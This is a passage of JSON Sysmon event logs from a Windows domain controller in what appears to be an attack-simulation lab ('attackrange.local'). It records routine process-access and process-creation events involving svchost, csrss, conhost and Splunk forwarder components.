C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:30.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2256,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:30.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:30.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2257,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:30.408\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F7A-5F25-0000-001038160400}\r\nTargetProcessId: 3808\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:30.408","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F7A-5F25-0000-001038160400}","TargetProcessId":"3808","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2258,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:30.423\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F7A-5F25-0000-001038160400}\r\nTargetProcessId: 3808\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:30.423","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F7A-5F25-0000-001038160400}","TargetProcessId":"3808","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2259,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:31.084\r\nProcessGuid: {41C8662E-1F7B-5F25-0000-001054180400}\r\nProcessId: 3508\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:31.084","ProcessGuid":"{41C8662E-1F7B-5F25-0000-001054180400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2260,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:31.251\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3076\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F7B-5F25-0000-001054180400}\r\nTargetProcessId: 3508\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:31.251","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3076","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F7B-5F25-0000-001054180400}","TargetProcessId":"3508","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2261,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:31.251\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F7B-5F25-0000-001054180400}\r\nTargetProcessId: 3508\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:31.251","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F7B-5F25-0000-001054180400}","TargetProcessId":"3508","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2262,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:31.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:31.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2263,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:31.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:31.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
